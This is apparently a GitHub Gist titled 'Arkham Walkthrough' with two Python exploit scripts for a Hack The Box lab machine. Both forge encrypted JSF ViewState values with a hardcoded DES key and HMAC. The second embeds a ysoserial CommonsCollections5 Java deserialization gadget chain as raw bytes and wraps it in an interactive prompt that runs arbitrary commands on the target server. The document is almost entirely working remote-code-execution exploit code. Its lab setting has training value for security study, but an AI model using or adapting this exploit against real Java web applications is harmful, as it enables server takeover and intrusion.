Last active
October 1, 2019 14:30
-
-
Save kkirsche/8b32d3b85e0c4c9e1d4b503d82a7547b to your computer and use it in GitHub Desktop.
Arkham Walkthrough
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from requests import post | |
from base64 import b64encode, b64decode | |
from hashlib import sha1 | |
from pyDes import des, ECB, PAD_PKCS5 | |
import hmac | |
def create_payload(): | |
payload = "" | |
with open("payload.bin", "rb") as f: | |
payload = f.read() | |
if payload == "": | |
raise ValueError("Payload should not be empty!") | |
return encrypt_payload(payload) | |
def encrypt_payload(payload): | |
key = b64decode("SnNGOTg3Ni0=") | |
crypter = des(key, ECB, padmode=PAD_PKCS5) | |
encrypted = crypter.encrypt(payload) | |
hmac_hash = hmac.new(key, bytes(encrypted), sha1).digest() | |
payload = encrypted + hmac_hash | |
return b64encode(payload) | |
def exploit_arkham(): | |
url = "http://10.10.10.130:8080/userSubscribe.faces" | |
view_state = create_payload() | |
data = {'javax.faces.ViewState': view_state} | |
resp = post(url, data=data) | |
print(resp.text) | |
if __name__ == "__main__": | |
exploit_arkham() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from requests import post | |
from base64 import b64encode, b64decode | |
from hashlib import sha1 | |
import pyDes | |
import hmac | |
def create_payload(cmd): | |
payload = b'' | |
payload += b'\xac\xed\x00\x05\x73\x72\x00\x2e\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x42\x61\x64\x41\x74' | |
payload += b'\x74\x72\x69\x62\x75\x74\x65\x56\x61\x6c\x75\x65\x45\x78\x70\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd4\xe7\xda\xab\x63\x2d' | |
payload += b'\x46\x40\x02\x00\x01\x4c\x00\x03\x76\x61\x6c\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63' | |
payload += b'\x74\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a' | |
payload += b'\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5' | |
payload += b'\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e' | |
payload += b'\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x74\x00' | |
payload += b'\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61' | |
payload += b'\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65' | |
payload += b'\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00' | |
payload += b'\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x08\x70\x75\x72\x00\x1e\x5b' | |
payload += b'\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02' | |
payload += b'\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x03\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e' | |
payload += b'\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x08\x42\x00' | |
payload += b'\x06\x66\x6f\x72\x6d\x61\x74\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0f\x63\x6c\x61\x73\x73\x4c\x6f' | |
payload += b'\x61\x64\x65\x72\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73' | |
payload += b'\x71\x00\x7e\x00\x05\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64' | |
payload += b'\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x6f\x64\x75\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0d' | |
payload += b'\x6d\x6f\x64\x75\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x01\x00\x00\x00\x51\x74\x00\x03\x61\x70' | |
payload += b'\x70\x74\x00\x26\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x70\x61\x79\x6c\x6f\x61\x64\x73\x2e\x43\x6f\x6d\x6d\x6f\x6e\x73' | |
payload += b'\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x35\x74\x00\x18\x43\x6f\x6d\x6d\x6f\x6e\x73\x43\x6f\x6c\x6c\x65\x63\x74\x69' | |
payload += b'\x6f\x6e\x73\x35\x2e\x6a\x61\x76\x61\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x70\x70\x73\x71\x00\x7e\x00\x0b\x01' | |
payload += b'\x00\x00\x00\x33\x71\x00\x7e\x00\x0d\x71\x00\x7e\x00\x0e\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x10\x70\x70\x73\x71\x00\x7e' | |
payload += b'\x00\x0b\x01\x00\x00\x00\x22\x71\x00\x7e\x00\x0d\x74\x00\x19\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x47\x65\x6e\x65\x72' | |
payload += b'\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x14\x47\x65\x6e\x65\x72\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x2e\x6a' | |
payload += b'\x61\x76\x61\x74\x00\x04\x6d\x61\x69\x6e\x70\x70\x73\x72\x00\x1f\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c' | |
payload += b'\x65\x63\x74\x69\x6f\x6e\x73\x24\x45\x6d\x70\x74\x79\x4c\x69\x73\x74\x7a\xb8\x17\xb4\x3c\xa7\x9e\xde\x02\x00\x00\x78\x70' | |
payload += b'\x78\x73\x72\x00\x34\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63' | |
payload += b'\x74\x69\x6f\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79\x8a\xad\xd2' | |
payload += b'\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c\x00\x03\x6b\x65\x79\x71\x00\x7e\x00\x01\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c\x6a' | |
payload += b'\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61' | |
payload += b'\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e' | |
payload += b'\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00' | |
payload += b'\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f' | |
payload += b'\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68' | |
payload += b'\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73' | |
payload += b'\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01' | |
payload += b'\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68' | |
payload += b'\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72' | |
payload += b'\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73' | |
payload += b'\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8' | |
payload += b'\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d' | |
payload += b'\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73' | |
payload += b'\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69' | |
payload += b'\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e\x00\x01\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52' | |
payload += b'\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61' | |
payload += b'\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f' | |
payload += b'\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02' | |
payload += b'\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63' | |
payload += b'\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d' | |
payload += b'\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72' | |
payload += b'\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02' | |
payload += b'\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76' | |
payload += b'\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00' | |
payload += b'\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61' | |
payload += b'\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00' | |
payload += b'\x2f\x73\x71\x00\x7e\x00\x28\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x00\x74\x00' | |
payload += b'\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67' | |
payload += b'\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x2c\x73\x71\x00\x7e' | |
payload += b'\x00\x28\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9' | |
payload += b'\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00' | |
#payload += b'\x1c\x63\x6d\x64\x20\x2f\x63\x20\x70\x69\x6e\x67\x20\x2d\x6e\x20' | |
#payload += b'\x32\x20\x31\x30\x2e\x31\x30\x2e\x31\x34\x2e\x33\x37' | |
payload += (chr(len(cmd)).encode()) | |
payload += cmd.encode() | |
payload += b'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x01' | |
payload += b'\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x24\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67' | |
payload += b'\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e' | |
payload += b'\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72' | |
payload += b'\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02' | |
payload += b'\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00' | |
payload += b'\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78' | |
if payload == "": | |
raise ValueError("Payload should not be empty!") | |
return encrypt_payload(payload) | |
def encrypt_payload(payload): | |
key = b64decode("SnNGOTg3Ni0=") | |
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5) | |
encrypted = obj.encrypt(payload) | |
hmac_hash = hmac.new(key, bytes(encrypted), sha1).digest() | |
payload = encrypted + hmac_hash | |
return b64encode(payload) | |
def exploit_arkham(cmd): | |
url = "http://10.10.10.130:8080/userSubscribe.faces" | |
view_state = create_payload(cmd) | |
data = { 'javax.faces.ViewState': view_state } | |
resp = post(url, data=data) | |
if __name__ == "__main__": | |
while True: | |
cmd = input("=> ") | |
exploit_arkham(cmd) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment